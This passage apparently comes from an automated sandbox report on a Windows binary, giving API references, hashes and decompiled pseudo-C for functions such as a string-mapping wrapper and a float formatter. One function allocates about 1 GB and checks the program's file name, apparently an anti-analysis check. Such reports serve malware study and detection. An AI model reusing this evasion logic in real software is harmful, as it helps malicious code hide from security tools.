FlsFree, xrefs: 00414FB5
FlsGetValue, xrefs: 00414F9B

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2635119114-282957996
Opcode ID: 8b7c47e17ce58013eedca00d505786845e0a0554910e3b00f710b853cb6b55b6
Instruction ID: 8525d43e3e53cf2f5883449289eabdd7ccf69c5f9762bd7b322c2d67550ec3f3
Opcode Fuzzy Hash: 8b7c47e17ce58013eedca00d505786845e0a0554910e3b00f710b853cb6b55b6
Instruction Fuzzy Hash: 092156306407119AC7209F75ED89AAB7EE4EB86751710413BE494C32A0FFF88845CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 023D1F23 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 90memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,3B9ACA00), ref: 023D1F35
RtlAllocateHeap.NTDLL(00000000), ref: 023D1F3C
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 023D1F6A
_wcsrchr.LIBCMT ref: 023D1F7B
lstrlenW.KERNEL32(00000002), ref: 023D1F9D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 023D1FD4
HeapFree.KERNEL32(00000000), ref: 023D1FDB
MulDiv.KERNEL32(00000001,80000000,80000000), ref: 023D1FF0

Strings

(, xrefs: 023D1FBF
, xrefs: 023D1FBA
@, xrefs: 023D1FC4

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Process$AllocateFileFreeModuleName_wcsrchrlstrlen
String ID: $($@
API String ID: 443335681-2581157662
Opcode ID: 780908680a4d7d2d048c731add0e93185f32b801c450cca6a5f9adb0e46d316a
Instruction ID: b6bd10817e344ecdc3a3e52f02a31231d7fd2c2d25ee04106d0f3542a31b0116
Opcode Fuzzy Hash: 780908680a4d7d2d048c731add0e93185f32b801c450cca6a5f9adb0e46d316a
Instruction Fuzzy Hash: E92132732443186FEB306B75BC8CFBF7B9CEB05349F100629F98AC2091DB75844886A5

Uniqueness

Uniqueness Score: -1.00%

Function 004010BC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 90
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004010BC(void* __ecx) {
				short _v520;
				long _v524;
				signed int _t17;
				short* _t24;
				signed char _t29;
				void* _t35;
				void* _t36;
				void* _t38;
				WCHAR* _t40;

				_t36 = HeapAlloc(GetProcessHeap(), 0, 0x3b9aca00);
				if(_t36 == 0) {
					L15:
					return 0;
				}
				_v524 = 0;
				E00414310(_t36, 0x90, 0x3b9aca00);
				if(GetModuleFileNameW(0,  &_v520, 0x104) != 0) {
					_t38 = E00414370( &_v520, 0x5c);
					if(_t38 != 0) {
						_t24 = E004142E6(_t38, 0x2e);
						_t40 = _t38 + 2;
						_pop(_t35);
						if(_t24 != 0) {
							 *_t24 = 0;
						}
						_t29 = lstrlenW(_t40);
						if((_t29 & 0x00000001) != 0 || E0040104C(_t40, _t35) == 0 || _t29 != 0x10 && _t29 != 0x20 && _t29 != 0x28 && _t29 != 0x40) {
							_v524 = 1;
						}
					}
				}
				HeapFree(GetProcessHeap(), 0, _t36);
				if(_v524 == 0) {
					goto L15;
				} else {
					_t17 = MulDiv(1, 0x80000000, 0x80000000);
					asm("sbb eax, eax");
					return  ~_t17 + 1;
				}
			}

0x004010db
0x004010df
0x00401198
0x00000000
0x00401198
0x004010ec
0x004010f0
0x0040110b
0x00401119
0x0040111f
0x00401124
0x0040112b
0x0040112e
0x0040112f
0x00401131
0x00401131
0x0040113c
0x00401141
0x00401162
0x00401162
0x0040116a
0x0040111f
0x00401174
0x0040117e
0x00000000
0x00401180
0x00401189
0x00401193
0x00000000
0x00401195

APIs

GetProcessHeap.KERNEL32(00000000,3B9ACA00), ref: 004010CE
HeapAlloc.KERNEL32(00000000), ref: 004010D5
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401103
_wcsrchr.LIBCMT ref: 00401114
lstrlenW.KERNEL32(00000002), ref: 00401136
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040116D
HeapFree.KERNEL32(00000000), ref: 00401174
MulDiv.KERNEL32(00000001,80000000,80000000), ref: 00401189

Strings

(, xrefs: 00401158
@, xrefs: 0040115D
, xrefs: 00401153

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$Process$AllocFileFreeModuleName_wcsrchrlstrlen
String ID: $($@
API String ID: 602807139-2581157662
Opcode ID: fca7d219a8310caa86d017b49a2fa1fb3b515654e249a571abfd41435e6cd2d0
Instruction ID: 09b04b0f0655efb70ac190fe5ae038a40a3cebb616e7f5e336c8a662fbfdb8ac
Opcode Fuzzy Hash: fca7d219a8310caa86d017b49a2fa1fb3b515654e249a571abfd41435e6cd2d0
Instruction Fuzzy Hash: E52104312403096BE6246B71AC4CBBF779CDB49341F14043BFA51EA2E1C77E4C8882AD

Uniqueness

Uniqueness Score: -1.00%

Function 023EA127 Relevance: 16.8, APIs: 11, Instructions: 299COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0046A9DC,00000001,00000000,00000000,0046A9F0,00000038,023E76F1,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 023EA14E
GetLastError.KERNEL32 ref: 023EA160
MultiByteToWideChar.KERNEL32(?,00000000,023E792F,?,00000000,00000000,0046A9F0,00000038,023E76F1,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 023EA1E7
MultiByteToWideChar.KERNEL32(?,00000001,023E792F,?,?,00000000), ref: 023EA268
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 023EA282
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 023EA2BD

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 24bb716468408ce1907873f5d89ca86582d356d9ee3823e5dd82725902bec8a3
Instruction ID: feb601f07c1710a8ea939010f1652f250e58951227e308a41631c53408e83739
Opcode Fuzzy Hash: 24bb716468408ce1907873f5d89ca86582d356d9ee3823e5dd82725902bec8a3
Instruction Fuzzy Hash: C8B13072900229EFCF219FA4DC849EEBFB6FF08318F148129F916A61A0D7358959DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004192C0 Relevance: 16.8, APIs: 11, Instructions: 299
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004192C0(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x46a9f0);
				E004161C8(__ebx, __edi, __esi);
				_t199 =  *0x46d01c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x46a9dc, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x46d01c = 2;
						}
					} else {
						 *0x46d01c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x46d01c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x46cfdc; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x46cfec; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E0041A4F9( *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E00416C4A(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E0041A53C(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E00416C4A(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E00416320(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E00414310(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E0041A53C(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E00417CFF( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E00414310(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E00416203(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x46cfec; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E00416320(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E00416C4A(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E00416C4A(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E00416320(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E00417CFF(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E00417CFF(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}

0x004192c0
0x004192c0
0x004192c2
0x004192c7
0x004192ce
0x004192d4
0x004192da
0x004192ef
0x004192f9
0x004192ff
0x00419302
0x00419304
0x00419304
0x004192f1
0x004192f1
0x004192f1
0x004192ef
0x00419311
0x0041932e
0x0041932e
0x00419336
0x00419518
0x0041951b
0x0041951d
0x00419520
0x00419523
0x00419525
0x0041952a
0x0041952a
0x0041952d
0x00419530
0x00419532
0x00419537
0x00419537
0x0041953d
0x00419543
0x00419546
0x00419549
0x00419552
0x00419555
0x00419661
0x00419663
0x00419663
0x00419666
0x00419668
0x0041966b
0x00419670
0x00419671
0x00000000
0x00419671
0x0041955b
0x0041955c
0x0041955d
0x00419560
0x00419561
0x00419564
0x00419565
0x00419568
0x0041956d
0x00419570
0x00419573
0x00419575
0x00000000
0x00000000
0x00419589
0x0041958b
0x0041958e
0x00419590
0x00419638
0x0041963b
0x0041963b
0x0041963e
0x00419640
0x00419641
0x00419646
0x00000000
0x0041963e
0x00419596
0x0041959f
0x004195a4
0x004195a7
0x004195a9
0x004195af
0x004195b4
0x004195c9
0x004195cd
0x004195cf
0x004195f4
0x00419604
0x0041960a
0x0041960d
0x0041960f
0x00419615
0x00419618
0x0041961e
0x0041961f
0x00419620
0x00419623
0x00419626
0x00419632
0x00419634
0x00000000
0x00419634
0x00000000
0x004195d1
0x004195da
0x004195dc
0x004195de
0x00419611
0x00419611
0x00000000
0x00419611
0x004195e5
0x004195ea
0x004195ed
0x00000000
0x004195ed
0x00000000
0x00000000
0x00000000
0x00419344
0x00419347
0x0041954b
0x0041954b
0x00419673
0x0041967b
0x0041967b
0x0041934d
0x0041934f
0x00419352
0x00419355
0x0041935b
0x0041935d
0x00419362
0x00419362
0x00419386
0x00419388
0x0041938d
0x00000000
0x00419393
0x00419393
0x004193a3
0x004193a8
0x004193ad
0x004193b0
0x004193d4
0x004193f2
0x00419409
0x004194f5
0x004194f5
0x004194f8
0x004194fa
0x004194fd
0x00419502
0x00419503
0x00419506
0x00419508
0x0041950b
0x00419510
0x00419511
0x00000000
0x00419511
0x00419421
0x00419423
0x00419428
0x00000000
0x00000000
0x00419432
0x00419461
0x00419471
0x00419476
0x0041947b
0x0041947e
0x0041949f
0x004194a2
0x004194bc
0x004194d0
0x004194d2
0x004194d4
0x004194d5
0x004194d6
0x004194d9
0x004194df
0x004194e2
0x004194db
0x004194db
0x004194dc
0x004194dc
0x004194f3
0x004194f3
0x00000000
0x004194a4
0x004194a8
0x004194ae
0x004194b1
0x004194b3
0x00000000
0x00000000
0x004194b5
0x00000000
0x004194b5
0x004194a2
0x00419437
0x00419456
0x00419456
0x00000000
0x004193d6
0x004193da
0x004193df
0x004193e0
0x004193e5
0x00000000
0x00000000
0x004193eb
0x00000000
0x004193eb
0x004193d4
0x0041938d
0x00419336
0x00419313
0x00419316
0x00419319
0x00419319
0x0041931c
0x00000000
0x00000000
0x0041931e
0x00419321
0x00000000
0x00000000
0x00419323
0x00000000
0x00419323
0x0041932b
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,0046A9DC,00000001,00000000,00000000,0046A9F0,00000038,0041688A,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004192E7
GetLastError.KERNEL32 ref: 004192F9
MultiByteToWideChar.KERNEL32(?,00000000,00416AC8,?,00000000,00000000,0046A9F0,00000038,0041688A,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00419380
MultiByteToWideChar.KERNEL32(?,00000001,00416AC8,?,?,00000000), ref: 00419401
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041941B
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 00419456

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: d1967a3fa68c851c628244db981c787da145b18a3c8585164e4edd2125f94a67
Instruction ID: be99ee5c163a7d208a2b90dda49fe6579726efe811559ab48f38ca80c2fd37f6
Opcode Fuzzy Hash: d1967a3fa68c851c628244db981c787da145b18a3c8585164e4edd2125f94a67
Instruction Fuzzy Hash: C4B15E72800119EFCF119FA4DC959EE7BB5FF08314F14412AF925A2260D7398DA1DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 023E65D6 Relevance: 16.6, APIs: 11, Instructions: 115fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 023E6657
_strcat.LIBCMT ref: 023E666A
_strlen.LIBCMT ref: 023E6677
_strlen.LIBCMT ref: 023E6686
_strncpy.LIBCMT ref: 023E669D
_strlen.LIBCMT ref: 023E66A6
_strlen.LIBCMT ref: 023E66B3
_strcat.LIBCMT ref: 023E66D1
_strlen.LIBCMT ref: 023E6719
GetStdHandle.KERNEL32(000000F4,0046A058,00000000,00000000,00000000,00000000,00000000,00000000), ref: 023E6724
WriteFile.KERNEL32(00000000), ref: 023E672B

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID:
API String ID: 3601721357-0
Opcode ID: 064de29b124d832451684863d80de68d5c7551a92df08fa7f5fa28fd90495cfe
Instruction ID: 3120ee8d0883c4f63b26b0c061de66ff8ab7672256f9c9303102e0e785c23cf8
Opcode Fuzzy Hash: 064de29b124d832451684863d80de68d5c7551a92df08fa7f5fa28fd90495cfe
Instruction Fuzzy Hash: B1310772600224AADF30AF758CC6EAE336EEB54304F14441AE597E21D1EB34E55D8F65

Uniqueness

Uniqueness Score: -1.00%

Function 00419CDF Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00419CDF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				char _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				char _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x46c5a0; // 0xfb090c04
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E0041A937(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E0041A705(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E00419772( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E004197A0( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E00419772( &_v20);
									E00419772( &_v20);
									E00419714(__eflags,  &_v20,  &_v44);
									E00419772( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E004174C0();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E004174C0();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				_t83 =  &_v8; // 0x417721
				return E00417786(_t105,  *_t83);
			}

0x00419ce5
0x00419cea
0x00419ced
0x00419cf1
0x00419cfc
0x00419d08
0x00419d0c
0x00419d10
0x00419d14
0x00419d18
0x00419d1c
0x00419d20
0x00419d24
0x00419d28
0x00419d2c
0x00419d30
0x00419d34
0x00419d38
0x00419d3f
0x00419d41
0x00419d49
0x00419d43
0x00419d43
0x00419d43
0x00419d50
0x00419d53
0x00419d65
0x00419ddf
0x00419dea
0x00419e07
0x00419e0a
0x00419e19
0x00419e1d
0x00419e20
0x00419e25
0x00419e28
0x00419e2e
0x00419e38
0x00419e38
0x00419e39
0x00419e3f
0x00419e40
0x00419e44
0x00419e47
0x00419e4a
0x00419e5e
0x00419e5e
0x00419e61
0x00419e65
0x00419e65
0x00419e6a
0x00419e70
0x00419e70
0x00419e70
0x00419e75
0x00419e7c
0x00419e80
0x00419e85
0x00419e85
0x00419e85
0x00419e88
0x00419e8b
0x00419e8d
0x00419e91
0x00419e91
0x00419e97
0x00419e99
0x00419e9d
0x00419ea2
0x00419ea2
0x00419ea3
0x00419e99
0x00419e97
0x00419ea6
0x00419ea6
0x00419ea9
0x00419eab
0x00419eae
0x00419eb1
0x00419eb3
0x00419eb6
0x00419ebc
0x00419ebd
0x00419ec2
0x00419ec3
0x00419ecc
0x00419ed9
0x00419ee2
0x00419eef
0x00419ef2
0x00419ef5
0x00419ef5
0x00419ef5
0x00419ef8
0x00419efa
0x00419efa
0x00419f00
0x00419f00
0x00419f03
0x00419f06
0x00419f07
0x00419f0a
0x00419f0d
0x00419f4d
0x00419f4d
0x00419f4f
0x00000000
0x00000000
0x00419f47
0x00419f4a
0x00419f4c
0x00419f4c
0x00000000
0x00419f4c
0x00000000
0x00419f4a
0x00419f51
0x00419f53
0x00000000
0x00419f55
0x00419f55
0x00000000
0x00419f55
0x00419f0f
0x00419f1a
0x00419f1a
0x00419f1c
0x00000000
0x00000000
0x00419f11
0x00419f14
0x00419f16
0x00419f19
0x00419f19
0x00000000
0x00419f19
0x00000000
0x00419f14
0x00419f1e
0x00419f20
0x00419f22
0x00419f23
0x00419f23
0x00419f23
0x00419f26
0x00419f26
0x00419f28
0x00419f2a
0x00419f2a
0x00419f2c
0x00419f32
0x00000000
0x00419f32
0x00419e4c
0x00419e4f
0x00419e51
0x00419e53
0x00000000
0x00000000
0x00000000
0x00000000
0x00419e53
0x00419d67
0x00419d6e
0x00419d73
0x00419d81
0x00000000
0x00419d83
0x00419d83
0x00000000
0x00419d83
0x00419d8a
0x00419d8a
0x00419d8a
0x00419d8d
0x00419da4
0x00419da4
0x00419da6
0x00000000
0x00419da8
0x00419da8
